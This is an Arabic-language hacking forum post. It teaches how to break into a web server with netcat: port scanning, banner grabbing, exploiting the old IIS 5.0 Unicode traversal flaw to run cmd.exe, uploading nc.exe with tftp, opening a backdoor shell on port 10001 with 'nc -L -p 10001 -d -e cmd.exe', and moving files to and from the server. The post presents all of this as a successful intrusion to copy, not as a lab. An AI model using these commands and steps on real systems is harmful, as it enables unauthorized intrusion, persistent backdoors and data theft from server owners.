السلام عليكم والرحمه الله وبركاته
مرحبا اخواني اعضاء :: شبـكة الـعناكب الإحـترافـية ::
اليوم بنتكلم عن موضوع خطير جدا اداة النت كات net cat والاختراق بواسطتها .
البرنامج اداه من ادوات الدوس , هي فالحقيقه موجوده فاليونكس , لكن يمكن انزلها للويندوز والتعامل معها .
النت كات عباره عن اداه قابلة للكتباه والقرائه عبر اتصالات الشبكات TCP و UDP .
ولها استخدامات كثيره جدا و خطيره , مثلا بورت سكان , التنصت على البورتات , والعمل باك دور .
لتحميل النت كات من هنا : http://www.members.lycos.co.uk/harl...hack/netcat.zip
اول شي بستعرض بعض اهم اوامر النت كات :
-e specifies a program to exec after
making/receiving a connection
-g gateway source-routing hop point[s], up to 8
-G num source-routing oiter: 4, 8, 12
-i secs delay interval for lines sent, ports scanned
-l listen mode for inbound connections
-n only accept numeric IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize
-s addr local source address
-t netcat will respond to telnet option negotiation
"this allows it to connect to a telnetd and
get past initial negotiation far enough to get
a login prompt from the server"
-u UDP connection mode
-v verbose mode
-w secs wait - timeout for connects
-z zero I/O mode [used for scanning]
For NT netcat, all of the above options exist, plus a few others.
-d detach - don't open a new DOS window
-L keep listening after the current session terminates
بنتكلم عن طريق الاختراق بواسطة النت كات , والخطوات الي يجب ان نقوم بها :
-اولا البورت سكان :
تقدر تسوي سكان على البورتات عن طريق هذا الامر : nc –v –z 192.168.1.90 1-200
او الامر هذا : nc –v –w2 –z 192.168.1.90 1-200
نقره على هذا الشريط لتصغير الصوره
اداة النت والاختراق بواسطتها(مع مريومه)
192.168.1.90 هذا هو ايبي الجهاز او الموقع الي تبغي تسوي عليه بورت سكان .
طبعن علشان تطلع ايبي الموقع سو له ping ,. مثلا : ping www.drdeathx.com
الامر W2 هذا لتحديد مدة الاتصال , مثلا انا اخترت ثانيتين , اذا مC7صار تجاوب يروح على البورت الي بعده , اختصار للوقت .
1-200 هذي هي البورتات الي سوينا سكان بينهم , انا اخترت البورتات من 1 الى 200 .
شوفو النتئائج شو طلعت لنا , بورت المتصفح والتلنت والاف تي بي وغيرهم . ومكتوب حذالهم البورت مفتوح وله لا .
-ثانيا الاتصال بالبورتات :
مثلا عندنا موقع ونبغي نطلع معلومات عنه , مثل المعلومات الي يعطينا اياها موقع www.netcraft.com
بكل بساطه , نكتب الامر هذا : nc –v –n 192.168.1.90 80
نقره على هذا الشريط لعرض الصورة بالمقاس الحقيقي
اداة النت والاختراق بواسطتها(مع مريومه)
نقره على هذا الشريط لعرض الصورة بالمقاس الحقيقي
اداة النت والاختراق بواسطتها(مع مريومه)
الحين طلعنا معلومات عن البورت 21 و 80 , ولطع لنا ان الموقع شغال على ويندوز 2000 وعلى سيرفر IIS5.0 .و فيه ميكورسوفت FTP
حلو هذي معلومات بتفيدنا في تحديد الهدف للاختراق .
الحين بنشتغل شغل اجمد , وبنبدا فالتطبيق العملي , بنخترق الموقع .
بنخلي النت كات يفتح لنا باك دور فالموقع . طبعن لازم نحمل النت كات على الموقع اول شي علشان يفتح لنا الباك دور . كيف ؟؟
بما ان الموقع على سيرفر IIS5.0 , بنستخدم سكربتات اليو***ود الخطيره في رفعه .
نقره على هذا الشريط لعرض الصورة بالمقاس الحقيقي
اداة النت والاختراق بواسطتها(مع مريومه)
مثل ما تشوفون استخدمنا السكربت http://192.168.1.90/scripts/..%255c...md.exe?/c+dir+c
لاستعراض محتويات الدرايف C , عن طريق المجلد Scripts
وطلعت لنا النتائج : ********s and Settings , Inetpub , Program Files , WINNT
حلو , الحين بنرفع النت كات على سيرفر IIS
بنستخدم ال tftp , هذي الاداه مشابهه للاف تي بي , اكتب في الدوس tftp , اذا تبغي تعرف المزيد عنها .
نرجع الى موضوعنا :
نقره على هذا الشريط لعرض الصورة بالمقاس الحقيقي
اداة النت والاختراق بواسطتها(مع مريومه)
شوفو الاسكربت الي حطيناه هذي المره , نفس السكربت الاولي , لكن بدل امر الاستعراض dir , حطينا امر tftp , وطبقناه , هذي هي طريقه : TFTP [-i] host [GET | PUT] source [destination]
نحن في اختراقنا هذا الي سويناه : tftp –I 192.168.1.90 get nc.exe
طبعن في اسكربتات اليو***ود بدل المسافه نكتب +
فتصير بهذا الشكل : http:///c+TFTP+-i+192.168.1.9+GET+nc.exe
في برنامج رائع اسمه TFTPD32 , يطلع لك اذا النت كات انرفع بنجاح للسيرفر
وصلة البرنامج : http://perso.wanadoo.fr/philippe.jo...tftpd32.272.zip
موقع البرنامج : http://tftpd32.jounin.net
نقره على هذا الشريط لتصغير الصوره
اداة النت والاختراق بواسطتها(مع مريومه)
اداة النت والاختراق بواسطتها(مع مريومه)
الحين بنبدا فالشغل الحلو , بعد ما رفعنا النت كات وكل شي تمام , نبغي نخلي النت كات يفتح لنا باك دور (Back Door) .
علشان نخليه يفتح لنا الباك دور لازم نخليه فالاول يتنصت على بورت فالسيرفر , مثلا اخترت البورت 10001 , بعدين بنقدر نتصل بالبورت من جهازنا بستخدام النت كات .
انزين الحين بنطبق امر التنصت من السيرفر , هذا هو الامر : nc -L -p 10001 -d -e cmd.exe
نشرح شوية الاوامر هذي الي كتبناها :
Nc : يخلي الويندوز يشغل النت كات nc.exe
-L : يخبر النت كات بان لا يغلق وان ينتظر الانتصال
-p : لتحديد البورت الي بنتصنت عليه .
-d : يخبر النت كات بالتصال بالبرنامج الي نريد ان نشغله
-e : يخبر النت كات بالبرنامج الي نريده ان يشتغل بعد الاتصال بالبورت .
طبعن نحن اخترنا الدوس cmd.exe
الحين بنكتب الامر في سكربت اليو***ود , طبعن بيكون بهذا الشكل : http:///c+nc+-L+-p+10001+-d+-e+cmd.exe
شوفو الصوره :
نقره على هذا الشريط لعرض الصورة بالمقاس الحقيقي
اداة النت والاختراق بواسطتها(مع مريومه)
الحين تمام , النت كات تنصت على البورت 10001 , وفتح لنا باك دور على الدوس cmd.exe
الحين يا دورنا , علشان نتصل من جهازنا على النت كات الي على السيرفر .
نقره على هذا الشريط لعرض الصورة بالمقاس الحقيقي
اداة النت والاختراق بواسطتها(مع مريومه)
الحين مثل ما ملاحظين , بعد ما اتصلنا بالبورت المتنصتين عليه 10001 ,
بالامر nc –v –n 192.168.1.90 10001
دخلنا على ملف scripts الي فالسيرفر , وطبقنا الامر ipconfig , والنتيجه انه طلع لنا ايبي السيرفر (^_^)
الحين تمام صار عندنا تحكم بعيد على السيرفر .
الحين نبغي ننقل الملفات بواسطة النت كات , كيف ؟؟
نقدر عن طريق ال TFTP , لكن لازم نسويها مره ثانيه عن طريق اليو***ود , لكن ليش نحن خلاص تعاملنا الحين مع النت كات وهو افضل وعندنا اتصال خارجي معاه .
اول شي امر استقبال او سحب ملف من السيرفر , مثلا اذا كان فالسيرفر ملف اسمه hack.txt , ونبغي نسحبه , بنطبق هذا الامر : nc –l –p 1234 >hack.txt
1234 هذا هو البورت الي بنستخدمه في سحب الملف .
نقره على هذا الشريط لعرض الصورة بالمقاس الحقيقي
اداة النت والاختراق بواسطتها(مع مريومه)
انزين , واذا حبينا انا نرفع ملف للسيرفر , كيف ؟؟
عن طريق هذا الامر : nc 192.168.1.90 1234 <hack.txt , ^C
نقره على هذا الشريط لعرض الصورة بالمقاس الحقيقي
اداة النت والاختراق بواسطتها(مع مريومه)
الحين تمام , نستعرض محتوايات المجلد بالامر dir , ونتاكد ان كل شي تمام وان الملف انرفع .
وعلشان نشغل الملف في السيرفر , نستخدم الامر ! , hack.txt!
نقره على هذا الشريط لعرض الصورة بالمقاس الحقيقي
اداة النت والاختراق بواسطتها(مع مريومه)
اداة النت والاختراق بواسطتها(مع مريومه)
مبروك عليك الاختراق , والعمليه تمت بنجاح ...
اتمنى ان يكون الموضوع حاز على اعجابكم ,
وتقبلو خالص تحياتي
المصدر: .:: منتديات العاصفة - اول منتدى عربي متخصص في التقنية والحماية ::. - من قسم: :: مملكة حماية البريد و الأجهزة ::